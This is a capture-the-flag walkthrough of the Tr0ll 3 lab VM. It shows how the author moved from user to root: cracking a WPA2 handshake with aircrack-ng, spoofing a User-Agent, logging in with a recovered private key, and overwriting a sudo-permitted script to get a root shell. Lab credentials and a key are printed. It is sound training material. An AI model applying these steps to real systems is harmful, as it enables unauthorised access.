Writeup

Tr0ll 3 – Please don’t feed the Troll (Walkthrough)

This post is also available in: Deutsch

The third episode of the Tr0ll series from @Maleus21 is a classic Boot-2-Root VM. Our goal is to move through different levels of users and finally gain root privileges to read the flag from /root/flag.txt. The following writeup is the summary for my solution to achieve this goal.

Level 0: start

The login information for the first user start with the password here is displayed in the start screen after the virtual machine boots up.

Tr0ll 3 - Startbildschirm

An initial port scan using nmap also shows that currently only SSH is available on port 22. However, this at least allows us to work on the machine via our own host.

basto@Malice:~$ ssh start@192.168.56.101
start@192.168.56.101's password: here
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

start@Tr0ll3:~$ 

In the home directory of the user start we find the two folders bluepill and redpill.

start@Tr0ll3:~$ ls -al *
bluepill:
total 12
drwxrwxr-x 2 start start 4096 Jun 18  2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start   18 Jun 17  2015 awesome_work

redpill:
total 12
drwxrwxr-x 2 start start 4096 Jun 17  2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start   17 Jun 17  2015 this_will_surely_work

The file awesome_work contains nothing but the URL http://bfy.tw/ODa. If we visit the given link, we will be forwarded to www.lmgtfy.com (Let me Google that for you) with the query “How do you make a hacker waste time”. So it’s pretty obvious that this clue is a dead end and was placed there as a joke.

basto@Malice:~$ curl http://bfy.tw/ODa
<html><body>You are being <a href="http://www.lmgtfy.com/?q=how+do+you+make+a+hacker+waste+time%3F">redirected</a>.</body></html>%   

As the story progresses, we are presented with similar information again and again, just to serve as a distraction. The machine lives up to its name and “trolls” us wherever it is possible.

The file this_will_surely_work in the redpill directory contains the string step2:Password1!. Our instinct tells us that these have to be the next credentials. But if we try to log in with the given information, we only receive an error message. Yet again, this is only a decoy.

First Clues

With the command find / -type f -perm 0777 2>/dev/null we can list files that can be read and edited by all users regardless of their owner. This allows us to identify the first actual clues:

start@Tr0ll3:~$ find / -type f -perm 0777 2>/dev/null
/var/log/.dist-manage/wytshadow.cap
/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt

On the one hand, we can read the file wytshadow.cap in the directory /var/log/.dist-manage/. This appears to be a capture of network traffic including a WPA2 handshake.

start@Tr0ll3:~$ tcpdump -r /var/log/.dist-manage/wytshadow.cap
...
23:40:52.736808 Authentication (Open System)-1: Successful
23:40:52.742448 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown) 
23:40:52.743986 Authentication (Open System)-2: 
23:40:52.746024 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.748053 Assoc Response AID(1) : PRIVACY : Successful
23:40:52.750120 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.752176 EAPOL key (3) v2, len 95
23:40:52.753704 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.755752 EAPOL key (3) v1, len 117
23:40:52.757806 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown) 
23:40:52.759857 EAPOL key (3) v2, len 151

The password of the user wytshadow can probably be retrieved if we succeed in cracking the handshake.

The file gold_star.txt in the directory /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/ on the other hand contains numerous 10-character strings and serves us as a dictionary in our attempt to recover the password.

aircrack-ng -w gold_star.txt wytshadow.cap
aircrack-ng Ausgabe mit geknacktem Passwort

aircrack-ng spits out the correct password gaUoCe34t1 in a couple of minutes and with the new credentials we can now login as the user wytshadow:

start@Tr0ll3:~$ su wytshadow
Password: gaUoCe34t1
wytshadow@Tr0ll3:~$

Level 1: wytshadow

If we look through the home directory of wytshadow, the file oohfun immediately catches our attention. This file has the SUID bit set, which allows us to run the program with the permissions of the user genphlux.

wytshadow@Tr0ll3:~$ ls -al
total 48
drwx------  5 wytshadow wytshadow 4096 Aug 22 09:21 .
drwxr-xr-x 10 root      root      4096 Jun 19  2015 ..
-rw-------  1 wytshadow wytshadow  297 Aug 22 09:21 .bash_history
-rw-r--r--  1 wytshadow wytshadow  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 wytshadow wytshadow 3637 Jun 17  2015 .bashrc
drwx------  2 wytshadow wytshadow 4096 Jun 17  2015 .cache
drwx------  3 wytshadow wytshadow 4096 Aug  1 01:50 .gnupg
drwxrwxr-x  3 wytshadow wytshadow 4096 Aug 22 06:40 .local
-rwsrwxrwx  1 genphlux  root      8566 Jun 17  2015 oohfun
-rw-r--r--  1 wytshadow wytshadow  675 Jun 17  2015 .profile

However, when we actually run the oohfun, we just keep getting the output iM Cr@zY L1k3 AAA LYNX:

wytshadow@Tr0ll3:~$ ./oohfun 
iM Cr@zY L1k3 AAA LYNX
iM Cr@zY L1k3 AAA LYNX
...

If we examine the file content using strings, we can see that it contains the following line:

/lol/bin/run.sh -b 0.0.0.0

Unfortunately, we can’t modify run.sh, because the parent directory lol is also owned by the user genphlux.

wytshadow@Tr0ll3:~$ ls -al / | grep lol
drwsr-x--x   8 genphlux root     4096 May 22  2009 lol

In Linux, all commands that we can execute with root privileges can be listed with the command sudo -l:

wytshadow@Tr0ll3:~$ sudo -l
[sudo] password for wytshadow:
Matching Defaults entries for wytshadow on Tr0ll3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wytshadow may run the following commands on Tr0ll3:
    (root) /usr/sbin/service nginx start

We can see that the user wytshadow is allowed to start the nginx web server service, which is what we are doing next:

wytshadow@Tr0ll3:~$ sudo service nginx start

Doing a local check of the open ports using netstat confirms the successful start of the web server. We can now see the new service on port 8080.

wytshadow@Tr0ll3:~$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN

However, we cannot visit the web service since all requests get rejected with a 403 Forbidden error message.

basto@Malice:~$ curl 192.168.56.101:8080
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>

To narrow down the problem, we open the file /etc/nginx/sites-ed/default and take a look at the default configuration of the nginx web server. At the very beginning we notice the following block:

# Default server configuration
#
server {
        listen 8080 default_server;
        listen [::]:8080 default_server;
            if ($http_user_agent !~ "Lynx*"){
                return 403;
}

If requests do not include the user-agent Lynx, the server will always respond with a 403 error. Since the file is unfortunately read-only, we cannot change the configuration. However, using curl we can append our own user-agent header in the expected format.

basto@Malice:~$ curl -H "User-Agent: Lynx Basto" 192.168.56.101:8080
genphlux:HF9nd0cR!

We can now use the credentials received in the response to log in as the user genphlux.

wytshadow@Tr0ll3:~$ su genphlux
Password: HF9nd0cR!
genphlux@Tr0ll3:~$

Level 2: genphlux

As always, we first take a look at the home directory of the new user.

genphlux@Tr0ll3:~$ ls -al
total 52
drwx------  5 genphlux genphlux 4096 Aug 22 10:09 .
drwxr-xr-x 10 root     root     4096 Jun 19  2015 ..
-rw-------  1 genphlux genphlux  273 Aug 22 10:09 .bash_history
-rw-r--r--  1 genphlux genphlux  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 genphlux genphlux 3637 Jun 17  2015 .bashrc
drwx------  2 genphlux genphlux 4096 Jun 17  2015 .cache
drwx------  3 genphlux genphlux 4096 Aug  1 04:03 .gnupg
drwxrwxr-x  3 genphlux genphlux 4096 Aug 22 09:22 .local
-rw-rw-r--  1 genphlux genphlux 1675 Jun 18  2015 maleus
-rw-r--r--  1 genphlux genphlux  675 Jun 17  2015 .profile
-rw-------  1 genphlux genphlux 5649 Jun 17  2015 .viminfo
-rw-rw-r--  1 genphlux genphlux  931 Aug  2 15:56 xlogin

The file xlogin is just an HTML page that is a directory listing for the web directory /xlogin, which does not help us in any way.

xlogin

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /xlogin</title>
 </head>
 <body>
<h1>Index of /xlogin</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="maleus">maleus</a></td><td align="right">2015-06-18 00:27  </td><td align="right">1.6K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>

On the contrary, the file maleus is much more interesting. It appears to contain an RSA key, most likely to connect via SSH.

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
-----END RSA PRIVATE KEY-----

Now we try to log in with the private key for the user maleus. However, the SSH service prohibits us from using certificate files that have too broad permissions set. As a result, we have to first narrow down the file permissions in advance.

genphlux@Tr0ll3:~$ chmod 600 maleus 
genphlux@Tr0ll3:~$ ssh -i maleus maleus@192.168.56.101
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/advantage>

Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings
maleus@Tr0ll3:~$

Level 3.1: maleus (private key)

Since we do not yet have any knowledge of the actual password, we are currently unable to list the executable root commands using sudo -l. However, there are already several files in the home directory that deserve our attention.

maleus@Tr0ll3:~$ ls -al
total 80
drwx------  6 maleus maleus 4096 Dec 19 07:05 .
drwxr-xr-x 10 root   root   4096 Jun 19  2015 ..
-rw-------  1 maleus maleus   42 Dec 19 07:05 .bash_history
-rw-r--r--  1 maleus maleus  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 maleus maleus 3637 Jun 17  2015 .bashrc
drwx------  2 maleus maleus 4096 Jun 17  2015 .cache
-rwxrwxr-x  1 maleus maleus   37 Aug 22 10:04 dont_even_bother
drwx------  3 maleus maleus 4096 Aug  1 03:48 .gnupg
-rw-rw-r--  1 maleus maleus  145 Jun 18  2015 index.html
drwxrwxr-x  3 maleus maleus 4096 Aug 22 09:47 .local
-rw-r--r--  1 maleus maleus  675 Jun 17  2015 .profile
drwx------  2 maleus maleus 4096 Jun 18  2015 .ssh
-rw-------  1 maleus maleus 1301 Aug  2 16:02 .viminfo
-rw-rw-r--  1 maleus maleus  931 Aug 22 09:55 xlogin

If we look at the source code of index.html, it seems that the next clue is immediately revealed.

index.html

<html>
<body>
<img src="pic.jpg">
</body>
</html>
<!-- Wow, looking at the source code, you are truly l33t! The next step uses fido:x4tPl! >

Unfortunately, it’s not possible to login as the user fido with the given password. It seems as if the troll has yet again played with our emotions.

Likewise, we get misled by the file dont_even_bother. If we run it, we are prompted to enter a password.

maleus@Tr0ll3:~$ ./dont_even_bother

 Enter the password : 

 Wrong Password

A quick look at the strings contained in the file will reveal the required value:

maleus@Tr0ll3:~$ strings dont_even_bother
Enter the password : 
xl8Fpx%6

maleus@Tr0ll3:~$ ./dont_even_bother

 Enter the password : xl8Fpx%6

 Correct Password 

 Your reward is just knowing you did it! :-P

So it looks like we still haven’t gotten anywhere with this user.

The file .viminfo contains the history of commands that were typed in the Vim text editor. Among other things, this file also contains the following excerpt, which seems to include the input of a user password:

.viminfo

# Registers:
""1     LINE    0
        passwd
"2      LINE    0
        B^slc8I$
"3      LINE    0
        passswd

Level 3.2: maleus (password)

If we now try to execute the command sudo -l with the new-found password, we will get our next hint.

maleus@Tr0ll3:~$ sudo -l 
[sudo] password for maleus: 
Matching Defaults entries for maleus on Tr0ll3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User maleus may run the following commands on Tr0ll3:
    (root) /home/maleus/dont_even_bother

As we can see, the user maleus has the ability to execute the file /home/maleus/dont_even_bother with the permissions of the root user.

We can’t do much with the current version of the file, but our user is permitted to modify it. Thus, we overwrite dont_even_bother with the command to start a new shell.

maleus@Tr0ll3:~$ echo "bash" > dont_even_bother

Next we execute the overwritten code with sudo permissions.

maleus@Tr0ll3:~$ sudo ./dont_even_bother
root@Tr0ll3:~# id
uid=0(root) gid=0(root) groups=0(root)

Level 4: root

As the final step we can now use our root privileges to read the contents of the flag:

root@Tr0ll3:~# cat /root/flag.txt 
You are truly a Jedi!

Twitter Proof:

Pr00fThatTh3L33tHax0rG0tTheFl@g!!

@Maleus21